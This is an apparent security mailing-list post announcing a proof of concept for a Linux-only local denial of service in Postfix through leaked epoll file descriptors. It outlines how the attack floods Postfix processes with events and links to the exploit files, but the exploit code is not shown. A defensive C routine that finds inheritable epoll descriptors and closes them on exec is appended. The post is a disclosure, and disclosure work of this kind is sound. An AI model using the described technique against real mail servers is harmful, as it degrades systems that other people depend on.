
Postfix Linux-only local denial of service - PoC




Hello,

I have released this PoC for the Linux-only local denial of service
caused by the leak of epoll file descriptors.

This proof of concept creates a pipe and adds it to Postfix's epoll file
descriptor.
When the pipe is added, an endless loop will launch lots of events to
the local and master Postfix processes.
This PoC will slow down the system a lot.

You can find all the needed files at
http://www.wekk.net/research/CVE-2008-4042/ and 
http://www.wekk.net/research/CVE-2008-3889/ and attached to this
email.

Feel free to write me for feedback, corrections, etc.

-- 
  Albert Sellarès        GPG id: 0x13053FFE
http://www.wekk.net whats_up@jabber.org 
  Linux User: 324456     Catalunya           

Attachment: CVE-2008-4042-exploit.c

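The message above attributes the denial of service to a leaked epoll file descriptor. As an added example (not part of the original post, the attachment, or Postfix's code), the following C audit counts epoll descriptors in the current process that would stay open across exec() and can set close-on-exec on them; the function name `leaky_epoll_fds` is hypothetical, and Linux with /proc mounted is assumed.

```c
/* Added example, not from the original post: find epoll descriptors that
 * would be inherited across exec() and mark them close-on-exec. Linux only. */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Count open epoll descriptors lacking FD_CLOEXEC. If fix is non-zero, also
 * set the flag on each one. Returns -1 if /proc/self/fd cannot be read. */
int leaky_epoll_fds(int fix)
{
    DIR *dir = opendir("/proc/self/fd");
    struct dirent *de;
    int count = 0;

    if (dir == NULL)
        return -1;
    while ((de = readdir(dir)) != NULL) {
        char path[64], target[64];
        int fd, flags;
        ssize_t n;

        if (de->d_name[0] < '0' || de->d_name[0] > '9')
            continue;                       /* skip "." and ".." */
        fd = atoi(de->d_name);
        snprintf(path, sizeof path, "/proc/self/fd/%d", fd);
        n = readlink(path, target, sizeof target - 1);
        if (n < 0)
            continue;
        target[n] = '\0';
        flags = fcntl(fd, F_GETFD);
        if (flags < 0 || (flags & FD_CLOEXEC) ||
            strcmp(target, "anon_inode:[eventpoll]") != 0)
            continue;                       /* not an inheritable epoll fd */
        count++;
        if (fix)
            fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
    }
    closedir(dir);
    return count;
}

int main(void)
{
    int legacy = epoll_create(1);            /* inheritable by default */
    int safe = epoll_create1(EPOLL_CLOEXEC); /* closed automatically on exec */
    printf("inheritable epoll fds found: %d\n", leaky_epoll_fds(1));
    printf("remaining after fix: %d\n", leaky_epoll_fds(0));
    close(legacy);
    close(safe);
    return 0;
}
```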

